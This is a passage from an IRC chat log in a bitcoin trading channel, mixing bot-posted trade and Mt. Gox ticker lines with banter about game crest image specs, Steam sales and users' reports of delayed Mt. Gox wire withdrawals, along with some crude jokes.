grok already. Jul 16 18:36:58 because ideas! Jul 16 18:37:39 mp, your new mask made the head area larger. I assume you know this, but it does feel a bit top-heavy now. Jul 16 18:38:39 is this black edging some kind of shadow on the crest box or something, or just an awkward way to make your original spec not wrong ;) Jul 16 18:39:11 um Jul 16 18:39:16 how ? it's 400/800 neh ? Jul 16 18:39:55 and na, the edge has to do with how the software uses the images Jul 16 18:40:11 i guess i made a confusing spec originally in that i didn't correctly separate things for ppl. Jul 16 18:41:35 top center box on grid is now 330x440 Jul 16 18:41:47 [HAVELOCK] [AM100] 14 @ 0.040301 = 0.5642 BTC [-] Jul 16 18:41:48 [HAVELOCK] [AM100] 100 @ 0.0403 = 4.03 BTC [-] Jul 16 18:42:01 dead center is 330x660, roughly Jul 16 18:42:12 no Jul 16 18:42:19 lol wtf why is this such a thing Jul 16 18:42:25 330x360 Jul 16 18:42:43 well do you want the gfx to fit or not? Jul 16 18:42:54 shield is not smaller than the head Jul 16 18:42:55 i do i do i just don't understand wtf im doing wrong Jul 16 18:42:57 now* Jul 16 18:42:59 that it causes so much confusion Jul 16 18:43:42 Head = 330x440, Shield= 330x360 Jul 16 18:43:55 i am assuming you want the shield larger than the head Jul 16 18:44:03 maybe i'm wrong Jul 16 18:44:52 they're equal tho. Jul 16 18:44:58 not in your file Jul 16 18:45:03 vertically the head is from 0 to 400. the shield from 400 to 800 Jul 16 18:45:27 there's a thick-ish line on both sides of the 400 and 800 rule, showing tolerances Jul 16 18:45:30 your marked line is at 440 though Jul 16 18:45:34 not 400 Jul 16 18:45:35 da fuck. Jul 16 18:45:54 whoa Jul 16 18:45:57 jesus. Jul 16 18:46:12 brb screaming. Jul 16 18:46:15 lol Jul 16 18:47:02 lol Jul 16 18:47:08 wtf are you two developing Jul 16 18:47:46 he's making a game that has crests in it Jul 16 18:47:52 I wanna make one Jul 16 18:48:02 so I am trying to get the specs right Jul 16 18:48:05 Ah gotcha Jul 16 18:49:55 [BTCTC] [TAT.ASICMINER] 62 @ 0.042889 = 2.6591 BTC [-] Jul 16 18:50:05 Man I wish I had kept more screen shots of my old game Jul 16 18:50:16 [BTCTC] [TAT.ASICMINER] 38 @ 0.042889 = 1.6298 BTC [-] Jul 16 18:50:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.042 = 0.504 BTC [-] Jul 16 18:50:19 old mod based off Unreal 1.0 Jul 16 18:50:35 mp, when you are done whipping your graphics team, I need to further annoy you. Jul 16 18:50:52 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [-] Jul 16 18:50:58 The footer banner needs a spec as well Jul 16 18:51:13 for the live area for the text Jul 16 18:51:42 [BTCTC] [TAT.ASICMINER] 27 @ 0.042001 = 1.134 BTC [+] Jul 16 18:52:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.042889 = 0.0858 BTC [+] Jul 16 18:53:46 ThickAsThieves which is that ? Jul 16 18:54:42 [BTCTC] [COGNITIVE] 1 @ 0.885 BTC [+] Jul 16 18:54:44 [BTCTC] [COGNITIVE] 2 @ 0.888 = 1.776 BTC [+] Jul 16 18:54:45 [BTCTC] [COGNITIVE] 8 @ 0.89 = 7.12 BTC [+] Jul 16 18:55:40 in your drawing it looks like the footer supports some sort of banner Jul 16 18:55:41 anyway. mask surrepitiously replaced. Jul 16 18:55:50 which I assume has text to be overlaid Jul 16 18:55:51 please pore over it again so i can sleep easy. Jul 16 18:56:02 a, the footer can be anything you please. Jul 16 18:56:11 ok cool Jul 16 18:56:16 [BTCTC] [ASICMINER-PT] 1 @ 4.421001 BTC [-] Jul 16 18:56:18 [BTCTC] [ASICMINER-PT] 2 @ 4.421 = 8.842 BTC [-] Jul 16 18:56:20 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 16 18:56:41 a motto often works well enough, but it's not required. Jul 16 18:56:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.042889 = 1.0722 BTC [+] Jul 16 18:57:50 png looks good, thanks Jul 16 18:58:17 [BTCTC] [TAT.ASICMINER] 60 @ 0.0429 = 2.574 BTC [+] Jul 16 18:59:50 the reason the top is as large as the mid is that people pile shit in there like you wouldn't believe. Jul 16 19:00:00 [BTCTC] [TAT.ASICMINER] 40 @ 0.0429 = 1.716 BTC [+] Jul 16 19:00:13 consider this : https://upload.wikimedia.org/wikipedia/commons/b/bc/Grand_Royal_Coat_of_Arms_of_France_%26_Navarre.svg Jul 16 19:00:41 fancy Jul 16 19:01:29 ya but i mean see ? there's a helmet, atop which a crown Jul 16 19:01:33 atop which a fucking circus tent Jul 16 19:01:35 [BTCTC] [PAJKA.BOND] 3 @ 0.03251 = 0.0975 BTC [+] Jul 16 19:01:35 atop which another crown Jul 16 19:01:44 atop which the king's mother sucking cock on a pike Jul 16 19:01:48 atop which another crown Jul 16 19:02:08 racks on racks on racks Jul 16 19:02:10 i just sent a realy nasty message to my mother Jul 16 19:02:18 kinky Jul 16 19:02:19 i feel like an ass Jul 16 19:02:33 call her and tell he rso Jul 16 19:02:35 my mother is a child Jul 16 19:02:45 is it her fault ? Jul 16 19:03:08 lol Jul 16 19:03:28 it's a lifetime of her being "at fault" Jul 16 19:03:32 The n in montjoie, seems like it's off by a bit Jul 16 19:03:44 Needs some rotation Jul 16 19:04:12 you want a paragraph? Jul 16 19:04:24 dude. not only you're right Jul 16 19:04:24 i will give you a paragraph Jul 16 19:04:36 but this chan could find fault with holy mary full of cum i mean grace. Jul 16 19:05:51 Looks good though Jul 16 19:06:01 thats a wiki man Jul 16 19:06:12 not part of the game Jul 16 19:06:17 hmmm Jul 16 19:06:20 you're right Jul 16 19:06:30 I need more coffee Jul 16 19:08:55 [BTCTC] [AMC-PT] 76 @ 0.002498 = 0.1898 BTC [+] Jul 16 19:09:23 holding arrows? Jul 16 19:13:43 [BTCTC] [DMS.MINING] 1 @ 0.0151 BTC [-] Jul 16 19:13:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 16 19:14:39 [BTCTC] [AMC-PT] 1 @ 0.002498 BTC [+] Jul 16 19:16:29 Dark Age of Camelot pretty much took up most of my time Jul 16 19:18:17 [BTCTC] [AMC-PT] 1 @ 0.002498 BTC [+] Jul 16 19:19:59 [BTCTC] [TAT.ASICMINER] 60 @ 0.0429 = 2.574 BTC [-] Jul 16 19:20:00 [BTCTC] [LTC-ATF.B2] 2 @ 0.010444 = 0.0209 BTC [+] Jul 16 19:20:04 [BTCTC] [TAT.ASICMINER] 73 @ 0.042889 = 3.1309 BTC [-] Jul 16 19:20:06 [BTCTC] [COGNITIVE] 1 @ 0.887999 BTC [-] Jul 16 19:20:40 [HAVELOCK] [AM100] 1 @ 0.04116998 BTC [+] Jul 16 19:20:42 [HAVELOCK] [AM100] 1 @ 0.04118999 BTC [+] Jul 16 19:20:43 [HAVELOCK] [AM100] 5 @ 0.04125387 = 0.2063 BTC [+] Jul 16 19:20:44 [HAVELOCK] [AM100] 4 @ 0.04125388 = 0.165 BTC [+] Jul 16 19:20:46 [HAVELOCK] [AM100] 10 @ 0.041254 = 0.4125 BTC [+] Jul 16 19:20:47 [HAVELOCK] [AM100] 20 @ 0.041255 = 0.8251 BTC [+] Jul 16 19:20:47 [HAVELOCK] [AM100] 15 @ 0.041255 = 0.6188 BTC [+] Jul 16 19:20:48 [HAVELOCK] [AM100] 10 @ 0.0415 = 0.415 BTC [+] Jul 16 19:20:49 [HAVELOCK] [AM100] 25 @ 0.04159899 = 1.04 BTC [+] Jul 16 19:20:50 [HAVELOCK] [AM100] 11 @ 0.0416 = 0.4576 BTC [+] Jul 16 19:21:06 [BTCTC] [TAT.ASICMINER] 49 @ 0.041603 = 2.0385 BTC [-] Jul 16 19:23:47 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [+] Jul 16 19:27:03 [BTCTC] [DMS.MINING] 5 @ 0.0151 = 0.0755 BTC [-] Jul 16 19:27:20 [HAVELOCK] [SDSTM] 4 @ 0.0108999 = 0.0436 BTC [+] Jul 16 19:28:03 [HAVELOCK] [SDSTM] 117 @ 0.01089 = 1.2741 BTC [-] Jul 16 19:29:06 [MPEX] [S.MPOE] 6000 @ 0.00092037 = 5.5222 BTC [-] Jul 16 19:29:18 SDSTM holders still haven't figured out the fund shares are worth .001, not .01 ... Jul 16 19:29:57 [HAVELOCK] [AM1] 1 @ 4.3 BTC [-] Jul 16 19:29:58 so it seems costa rica is about to blow up Jul 16 19:30:42 ? Jul 16 19:31:06 it sits atop a volcano pretty much Jul 16 19:31:14 ppl didn't even know until it blew up the first time Jul 16 19:31:21 and now there's been an earthquake swarm. Jul 16 19:32:06 isnt that where erik fled to? Jul 16 19:32:08 there's a certain amount of foreboding built into the word "swarm" Jul 16 19:32:28 ThickAsThieves he went to panama afaik Jul 16 19:32:32 oh yeah Jul 16 19:32:45 i was like pff, costa rica is where it's at, so he was considering moving Jul 16 19:32:47 but nao... Jul 16 19:38:29 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004001 = 0.012 BTC [+] Jul 16 19:39:23 [BTCTC] [COGNITIVE] 2 @ 0.879 = 1.758 BTC [-] Jul 16 19:40:18 [BTCTC] [DMS.MINING] 1 @ 0.015002 BTC [-] Jul 16 19:41:37 [BTCTC] [DMS.SELLING] 1 @ 0.02401 BTC [+] Jul 16 19:42:36 [BTCTC] [DMS.MINING] 7 @ 0.0151 = 0.1057 BTC [+] Jul 16 19:44:57 [BTCTC] [DMS.MINING] 24 @ 0.015002 = 0.36 BTC [-] Jul 16 19:44:59 [BTCTC] [DMS.MINING] 2 @ 0.015001 = 0.03 BTC [-] Jul 16 19:46:35 [BTCTC] [DMS.SELLING] 16 @ 0.02401 = 0.3842 BTC [+] Jul 16 19:46:48 [BTCTC] [AMC-PT] 5 @ 0.002498 = 0.0125 BTC [+] Jul 16 19:49:41 [BTCTC] [DMS.PURCHASE] 200 @ 0.039806 = 7.9612 BTC [-] Jul 16 19:53:07 [BTCTC] [DMS.MINING] 98 @ 0.015001 = 1.4701 BTC [-] Jul 16 19:53:09 [BTCTC] [DMS.MINING] 2 @ 0.015 = 0.03 BTC [-] Jul 16 19:53:57 [HAVELOCK] [SDSTM] 2 @ 0.011 = 0.022 BTC [+] Jul 16 19:53:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.0417 = 0.6255 BTC [+] Jul 16 19:54:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.0417 = 0.0834 BTC [+] Jul 16 19:54:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.0417 = 0.2085 BTC [+] Jul 16 19:54:07 [BTCTC] [DMS.SELLING] 40 @ 0.02401 = 0.9604 BTC [+] Jul 16 19:54:13 [BTCTC] [DMS.SELLING] 90 @ 0.02405 = 2.1645 BTC [+] Jul 16 19:54:15 [BTCTC] [DMS.SELLING] 9 @ 0.02409 = 0.2168 BTC [+] Jul 16 19:55:02 [BTCTC] [COGNITIVE] 1 @ 0.879998 BTC [+] Jul 16 19:55:14 [BTCTC] [BITVPS] 100 @ 0.00179 = 0.179 BTC [+] Jul 16 19:55:40 [HAVELOCK] [AM100] 5 @ 0.0412 = 0.206 BTC [-] Jul 16 19:55:52 [HAVELOCK] [AM100] 15 @ 0.0413 = 0.6195 BTC [+] Jul 16 19:56:50 [BTCTC] [S.DICE-PT] 13 @ 0.002357 = 0.0306 BTC [+] Jul 16 19:57:17 [HAVELOCK] [AM100] 100 @ 0.041399 = 4.1399 BTC [+] Jul 16 19:57:47 [BTCTC] [DMS.MINING] 10 @ 0.015 = 0.15 BTC [-] Jul 16 19:59:20 awww so dooglus changed course and rolled back ? Jul 16 19:59:30 yep Jul 16 19:59:41 creating an awfull mess Jul 16 19:59:55 people were all aggitated at erik for what they considered his poor management Jul 16 19:59:58 i liked this kid, until now Jul 16 20:00:09 this could have been handled a lot better tho. Jul 16 20:00:31 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [+] Jul 16 20:01:32 mircea, why didn't he just took the loss as stated previously, it's not like he had to pay the amount right now off his pockets, (unless everyone divested) Jul 16 20:02:01 it would amortize itself over time, as the site should be profitable, and leaving him an clean reputation Jul 16 20:02:12 one part I find odd is that from what I read, this somehow puts 100+ btc back into celeste's account Jul 16 20:02:22 honestly i;'d have been more worried if he kept up the pretense of paying from his own pocket Jul 16 20:02:29 im not so certain he has 1300 btc of his own. Jul 16 20:02:45 rolling back wasn't that crazy a choice Jul 16 20:02:47 me neither, but he isn't required to Jul 16 20:02:55 it just seems it cuz forum asses Jul 16 20:03:00 ThickAsThieves well tyhis is why you want experienced management Jul 16 20:03:06 they make the call right then and there and stick to it. Jul 16 20:03:13 you just add that sum to the site's liabilities Jul 16 20:03:37 that's be fractional banking Jul 16 20:03:39 Apocalyptic congrats, you've stumbled upon the definition of fractional reserve. Jul 16 20:03:43 which he claims not to do Jul 16 20:04:05 guise, he is here Jul 16 20:04:09 he never checks irc though Jul 16 20:04:15 o hai dooglus Jul 16 20:06:11 in other news, gox hasn't sent a single wire to customers in the last month https://bitcointalk.org/index.php?topic=251895.0 Jul 16 20:06:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.041712 BTC [+] Jul 16 20:06:18 you don't say. Jul 16 20:06:32 give em a couple weeks Jul 16 20:07:23 Scrat, they did Jul 16 20:07:46 some guy claims to have received one today, 1.5 months after the request Jul 16 20:07:54 Apocalyptic: url Jul 16 20:08:26 #bitcoin-otc chan Jul 16 20:08:30 [HAVELOCK] [AM100] 1 @ 0.041391 BTC [-] Jul 16 20:08:44 new wave of steam sales Jul 16 20:08:49 "You can pre-order your withdrawal now, they will be up and running in about two weeks" Jul 16 20:08:53 Looks like I'm getting Alan Wake Jul 16 20:09:17 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 16 20:09:20 ThickAsThieves are you making the snark up or is it actually their inept pr ? Jul 16 20:10:11 it's a joke from mr lambert Jul 16 20:10:49 [BTCTC] [COGNITIVE] 1 @ 0.820001 BTC [-] Jul 16 20:10:56 [BTCTC] [COGNITIVE] 1 @ 0.82 BTC [-] Jul 16 20:10:58 [BTCTC] [COGNITIVE] 1 @ 0.81 BTC [-] Jul 16 20:10:59 [BTCTC] [COGNITIVE] 2 @ 0.801001 = 1.602 BTC [-] Jul 16 20:11:01 [BTCTC] [COGNITIVE] 2 @ 0.801001 = 1.602 BTC [-] Jul 16 20:11:02 [BTCTC] [COGNITIVE] 1 @ 0.801 BTC [-] Jul 16 20:11:19 [BTCTC] [DMS.MINING] 3 @ 0.015 = 0.045 BTC [-] Jul 16 20:11:50 not bad. Jul 16 20:12:56 [BTCTC] [B.YABMC] 1 @ 0.002304 BTC [-] Jul 16 20:13:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.041717 = 1.0429 BTC [+] Jul 16 20:13:24 Yeah I have, 30mins worth at least Jul 16 20:13:35 [BTCTC] [B.YABMC] 1 @ 0.002303 BTC [-] Jul 16 20:13:37 [BTCTC] [B.YABMC] 10 @ 0.002302 = 0.023 BTC [-] Jul 16 20:14:00 Ended up getting Serious Sam 3 and Max Payne 3 too Jul 16 20:14:12 [BTCTC] [ASICMINER-PT] 1 @ 4.34001 BTC [-] Jul 16 20:14:15 [BTCTC] [ASICMINER-PT] 7 @ 4.330009 = 30.3101 BTC [-] Jul 16 20:14:17 [BTCTC] [ASICMINER-PT] 26 @ 4.330008 = 112.5802 BTC [-] Jul 16 20:14:41 And honestly for 3 bucks, how can I go wrong Jul 16 20:14:49 I did pay 120 for Duke Nuk'em Forever Jul 16 20:15:52 we still on the steam topic? Jul 16 20:16:04 nope Jul 16 20:16:23 Could be Jul 16 20:18:51 *mjr_* so i just read for free whenever i have 5 articles Jul 16 20:18:56 [BTCTC] [DMS.PURCHASE] 4 @ 0.039806 = 0.1592 BTC [-] Jul 16 20:19:07 *mjr_* i bought like a few thousand credits i think, but i have no clue where they are Jul 16 20:19:08 malaimo matthew_boyd Menoetius metabyte midnightmagic MiningBuddy mircea_popescu mitty mjr_ mod6 mpexbot Jul 16 20:23:49 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004194 = 0.0084 BTC [+] Jul 16 20:24:29 [MPEX] [S.MPOE] 8250 @ 0.00091645 = 7.5607 BTC [-] Jul 16 20:26:05 lmao "pre-order your withdrawal now" Jul 16 20:28:41 [BTCTC] [TAT.ASICMINER] 60 @ 0.041735 = 2.5041 BTC [+] Jul 16 20:30:35 I've seen people claim they got their MtGox withdrawals (especially out of US/Europe) and people in the US claim to have called their bank and they were told there was a wire but the bank is refusing it. Jul 16 20:35:17 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.004199 = 0.8398 BTC [+] Jul 16 20:36:26 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0042 = 0.42 BTC [+] Jul 16 20:37:36 *mjr_* ah, its fine, i'm just going to cycle my money instead Jul 16 20:37:36 *mjr_* been doing a lot of brokering for coins Jul 16 20:37:46 yes, on BitVPS website. Jul 16 20:38:20 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [+] Jul 16 20:39:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.042697 = 0.3843 BTC [+] Jul 16 20:45:56 [MPEX] [S.MPOE] 3200 @ 0.00091966 = 2.9429 BTC [+] Jul 16 20:45:58 [MPEX] [S.MPOE] 650 @ 0.00092069 = 0.5984 BTC [+] Jul 16 20:46:16 [BTCTC] [DMS.MINING] 1 @ 0.0151 BTC [+] Jul 16 20:46:52 [BTCTC] [DMS.PURCHASE] 4 @ 0.039806 = 0.1592 BTC [-] Jul 16 20:47:21 [BTCTC] [DMS.MINING] 9 @ 0.0151 = 0.1359 BTC [+] Jul 16 20:47:22 [BTCTC] [DMS.MINING] 10 @ 0.0151 = 0.151 BTC [+] Jul 16 20:47:56 Namworld, I ha my wire not sent for 30 days. I finally cancelled it and support put it back in my account in less than 5 minutes Jul 16 20:48:08 My wire was not sent for 30 days Jul 16 20:48:15 [BTCTC] [COGNITIVE] 1 @ 0.802001 BTC [+] Jul 16 20:48:17 [BTCTC] [COGNITIVE] 1 @ 0.802 BTC [-] Jul 16 20:48:19 [BTCTC] [COGNITIVE] 3 @ 0.801 = 2.403 BTC [-] Jul 16 20:48:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.042 = 0.63 BTC [-] Jul 16 20:48:49 heh. Jul 16 20:49:01 [BTCTC] [DMS.SELLING] 99 @ 0.0241 = 2.3859 BTC [+] Jul 16 20:49:03 [BTCTC] [DMS.SELLING] 100 @ 0.0242 = 2.42 BTC [+] Jul 16 20:49:04 [BTCTC] [DMS.SELLING] 100 @ 0.0243 = 2.43 BTC [+] Jul 16 20:49:05 [BTCTC] [DMS.SELLING] 100 @ 0.0244 = 2.44 BTC [+] Jul 16 20:49:07 [BTCTC] [DMS.SELLING] 100 @ 0.0245 = 2.45 BTC [+] Jul 16 20:52:24 [BTCTC] [DMS.MINING] 10 @ 0.0152 = 0.152 BTC [+] Jul 16 20:53:19 [BTCTC] [BASIC-MINING] 2 @ 0.659999 = 1.32 BTC [+] Jul 16 20:54:57 [BTCTC] [COGNITIVE] 1 @ 0.800001 BTC [-] Jul 16 20:56:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.042692 BTC [+] Jul 16 20:57:23 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 16 20:57:25 [HAVELOCK] [SDSTM] 192 @ 0.011 = 2.112 BTC [+] Jul 16 20:57:33 [BTCTC] [AMC-PT] 68 @ 0.002499 = 0.1699 BTC [+] Jul 16 20:57:35 [HAVELOCK] [SDSTM] 3 @ 0.011 = 0.033 BTC [+] Jul 16 20:57:58 [BTCTC] [TAT.ASICMINER] 19 @ 0.042691 = 0.8111 BTC [-] Jul 16 20:58:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.042692 = 0.1281 BTC [+] Jul 16 20:58:02 [BTCTC] [TAT.ASICMINER] 28 @ 0.042694 = 1.1954 BTC [+] Jul 16 20:58:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.0427 = 0.3416 BTC [+] Jul 16 20:58:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.042798 BTC [+] Jul 16 20:58:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.042799 = 0.0856 BTC [+] Jul 16 20:58:16 [BTCTC] [TAT.ASICMINER] 56 @ 0.042988 = 2.4073 BTC [+] Jul 16 20:58:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.042989 = 0.8598 BTC [+] Jul 16 20:58:20 [BTCTC] [TAT.ASICMINER] 65 @ 0.04299 = 2.7944 BTC [+] Jul 16 20:58:22 [BTCTC] [TAT.ASICMINER] 99 @ 0.043 = 4.257 BTC [+] Jul 16 20:59:02 [BTCTC] [COGNITIVE] 1 @ 0.7901 BTC [-] Jul 16 20:59:15 [BTCTC] [DMS.MINING] 2 @ 0.0154 = 0.0308 BTC [+] Jul 16 21:01:02 [BTCTC] [COGNITIVE] 1 @ 0.790101 BTC [+] Jul 16 21:03:13 [MPEX] [S.MPOE] 2279 @ 0.00092069 = 2.0983 BTC [+] Jul 16 21:03:27 [MPEX] [S.MPOE] 1721 @ 0.00092279 = 1.5881 BTC [+] Jul 16 21:04:12 [BTCTC] [DMS.PURCHASE] 200 @ 0.039806 = 7.9612 BTC [-] Jul 16 21:04:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.04339 = 0.0868 BTC [+] Jul 16 21:04:57 [BTCTC] [COGNITIVE] 1 @ 0.78 BTC [-] Jul 16 21:08:43 [BTCTC] [COGNITIVE] 1 @ 0.765 BTC [-] Jul 16 21:08:43 [BTCTC] [S.DICE-PT] 10 @ 0.002357 = 0.0236 BTC [+] Jul 16 21:08:44 [BTCTC] [TAT.ASICMINER] 17 @ 0.04339 = 0.7376 BTC [+] Jul 16 21:09:19 MtGox BTCUSD ticker | Best bid: 97.48000, Best ask: 97.48998, Bid-ask spread: 0.00998, Last trade: 97.01100, 24 hour volume: 18419.81365082, 24 hour low: 96.00000, 24 hour high: 100.73190, 24 hour vwap: 98.40194 Jul 16 21:09:29 [BTCTC] [S.BBET-PT] 1 @ 0.002077 BTC [+] Jul 16 21:09:31 [BTCTC] [S.BBET-PT] 9 @ 0.002078 = 0.0187 BTC [+] Jul 16 21:09:43 [BTCTC] [B.YABMC] 1 @ 0.003188 BTC [+] Jul 16 21:09:47 0.99593495935 Jul 16 21:09:59 [BTCTC] [COGNITIVE] 1 @ 0.829999 BTC [+] Jul 16 21:10:01 [BTCTC] [COGNITIVE] 2 @ 0.83 = 1.66 BTC [+] Jul 16 21:10:06 damn straight Jul 16 21:10:14 jborkl_, are you in the US? Jul 16 21:10:36 [BTCTC] [B.YABMC] 7 @ 0.003189 = 0.0223 BTC [+] Jul 16 21:11:56 [HAVELOCK] [AM100] 1 @ 0.041391 BTC [-] Jul 16 21:12:16 [HAVELOCK] [SDSTM] 2 @ 0.011 = 0.022 BTC [+] Jul 16 21:13:44 mjr_: https://www.bitcoinforum.com/coinbr-com/call-option-calculation/msg2445/ Jul 16 21:13:53 yes Jul 16 21:16:16 Could you try to call your bank, see if they refused a wire? I'd like confirmations from more than just random smucks in bitcoin-otc/bitcoin-anal Jul 16 21:16:34 I can tell you it was never sent Jul 16 21:16:54 support jerked me off for 3 weeks until I cancelled Jul 16 21:17:22 then then I just bought BTC back and moved it off Jul 16 21:17:30 [BTCTC] [LTC-ATF.B2] 4 @ 0.010444 = 0.0418 BTC [+] Jul 16 21:17:32 [BTCTC] [LTC-ATF.B2] 20 @ 0.010444 = 0.2089 BTC [+] Jul 16 21:17:39 That's the thing, people were jerked off with generic answer, but calling their bank, they were told the bank refused a wire. Jul 16 21:18:03 I asked GOX many times, they never indicated it was sent Jul 16 21:18:18 they always told me it was in the queue Jul 16 21:18:26 Ah. Jul 16 21:18:32 heh Jul 16 21:18:41 Well they never told anyone else it was sent either. Jul 16 21:18:51 Or admit they banks were refusing the deposits. Jul 16 21:19:13 US banks would be refusing Gox wires, probably related to the case where they got funds seized in the US. Jul 16 21:19:36 With how fast it was credited back after I cancelled, and that I have recieved wires to that bank 5 days before Jul 16 21:20:01 I do not think it was ever sent, and GOX said it was never sent Jul 16 21:20:16 [BTCTC] [S.BBET-PT] 10 @ 0.002082 = 0.0208 BTC [+] Jul 16 21:20:44 Yeah, but that's the thing, would be only Gox wires which don't go through. Jul 16 21:20:47 [BTCTC] [S.BBET-PT] 5 @ 0.002083 = 0.0104 BTC [+] Jul 16 21:20:49 [BTCTC] [S.BBET-PT] 5 @ 0.002085 = 0.0104 BTC [+] Jul 16 21:20:53 I would just use coinbase, haven't heard of anyone having trouble with em lately Jul 16 21:21:12 Gox never spoke a word about it. But then again, they never admit any issues. Jul 16 21:23:47 [BTCTC] [S.BBET-PT] 100 @ 0.0021 = 0.21 BTC [+] Jul 16 21:24:14 [BTCTC] [S.BBET-PT] 10 @ 0.002178 = 0.0218 BTC [+] Jul 16 21:25:25 [BTCTC] [S.BBET-PT] 400 @ 0.002179 = 0.8716 BTC [+] Jul 16 21:29:06 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.004001 = 0.072 BTC [-] Jul 16 21:35:16 [BTCTC] [DMS.MINING] 8 @ 0.0154 = 0.1232 BTC [+] Jul 16 21:35:18 [BTCTC] [DMS.MINING] 4 @ 0.0155 = 0.062 BTC [+] Jul 16 21:38:15 [BTCTC] [DMS.MINING] 100 @ 0.0152 = 1.52 BTC [-] Jul 16 21:40:24 [BTCTC] [DMS.MINING] 26 @ 0.0155 = 0.403 BTC [+] Jul 16 21:40:44 [BTCTC] [COGNITIVE] 1 @ 0.770001 BTC [-] Jul 16 21:40:53 i have seen that too. and it caused unusual amount of butthurtness on ycombinator news xD Jul 16 21:41:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.04339 = 0.1736 BTC [+] Jul 16 21:41:41 [BTCTC] [DMS.MINING] 10 @ 0.015555 = 0.1556 BTC [+] Jul 16 21:41:43 [BTCTC] [DMS.MINING] 21 @ 0.0156 = 0.3276 BTC [+] Jul 16 21:41:45 [BTCTC] [DMS.MINING] 18 @ 0.0156 = 0.2808 BTC [+] Jul 16 21:41:46 [BTCTC] [DMS.MINING] 15 @ 0.01565 = 0.2348 BTC [+] Jul 16 21:41:48 [BTCTC] [DMS.MINING] 40 @ 0.015699 = 0.628 BTC [+] Jul 16 21:41:49 [BTCTC] [DMS.MINING] 170 @ 0.0157 = 2.669 BTC [+] Jul 16 21:44:03 [BTCTC] [S.BBET-PT] 10 @ 0.002179 = 0.0218 BTC [+] Jul 16 21:45:24 [BTCTC] [AMC-PT] 3 @ 0.002496 = 0.0075 BTC [-] Jul 16 21:46:15 [BTCTC] [GSDPT] 5 @ 0.00202 = 0.0101 BTC [-] Jul 16 21:46:30 [BTCTC] [AMC-PT] 400 @ 0.002499 = 0.9996 BTC [+] Jul 16 21:47:10 [BTCTC] [BFMINES] 2 @ 0.003542 = 0.0071 BTC [-] Jul 16 21:48:15 ;;ticker Jul 16 21:48:16 MtGox BTCUSD ticker | Best bid: 97.30411, Best ask: 97.99499, Bid-ask spread: 0.69088, Last trade: 97.99499, 24 hour volume: 18236.20530588, 24 hour low: 96.00000, 24 hour high: 100.73190, 24 hour vwap: 98.39571 Jul 16 21:54:14 [BTCTC] [TAT.VIRTUALMINE] 231 @ 0.004001 = 0.9242 BTC [-] Jul 16 21:55:15 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0042 = 0.84 BTC [+] Jul 16 21:55:51 [BTCTC] [BMF] 27 @ 0.034 = 0.918 BTC [+] Jul 16 21:55:53 [BTCTC] [BMF] 1 @ 0.034253 BTC [+] Jul 16 21:55:54 [BTCTC] [BMF] 1 @ 0.035 BTC [+] Jul 16 21:57:11 ;;ident iamrichard Jul 16 21:57:12 Nick 'iamrichard', with hostmask 'iamrichard!6c0d7771@gateway/web/freenode/ip.108.13.119.113', is not identified. Jul 16 21:59:41 [BTCTC] [DMS.SELLING] 20 @ 0.0248 = 0.496 BTC [+] Jul 16 21:59:53 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0042 = 0.0126 BTC [+] Jul 16 22:00:01 ;;ticker Jul 16 22:00:02 MtGox BTCUSD ticker | Best bid: 97.05001, Best ask: 97.49999, Bid-ask spread: 0.44998, Last trade: 97.05000, 24 hour volume: 18101.97096272, 24 hour low: 96.00000, 24 hour high: 100.73190, 24 hour vwap: 98.39391 Jul 16 22:00:15 What's the command to see what PTs are at? Jul 16 22:00:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.043101 = 0.862 BTC [-] Jul 16 22:00:43 [BTCTC] [TAT.ASICMINER] 40 @ 0.0431 = 1.724 BTC [-] Jul 16 22:00:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.043001 = 0.172 BTC [-] Jul 16 22:00:48 [BTCTC] [TAT.ASICMINER] 699 @ 0.043 = 30.057 BTC [-] Jul 16 22:00:48 !ticker btct gsdpt Jul 16 22:00:50 [BTCT:GSDPT] 1D: 0.002011 / 0.00222 / 0.002296 (67 shares, 0.1 BTC), 7D: 0.001913 / 0.00212 / 0.002375 (4336 shares, 9.2 BTC), 30D: 0.0017 / 0.00217 / 0.0029 (14221 shares, 30.8 BTC) Jul 16 22:00:59 matthew_boyd: ^^ Jul 16 22:01:10 Ah, why thank you jurov! Jul 16 22:05:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00418 BTC [-] Jul 16 22:05:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00419 BTC [+] Jul 16 22:05:07 [BTCTC] [TAT.VIRTUALMINE] 312 @ 0.0042 = 1.3104 BTC [+] Jul 16 22:05:32 [BTCTC] [DMS.MINING] 200 @ 0.0157 = 3.14 BTC [+] 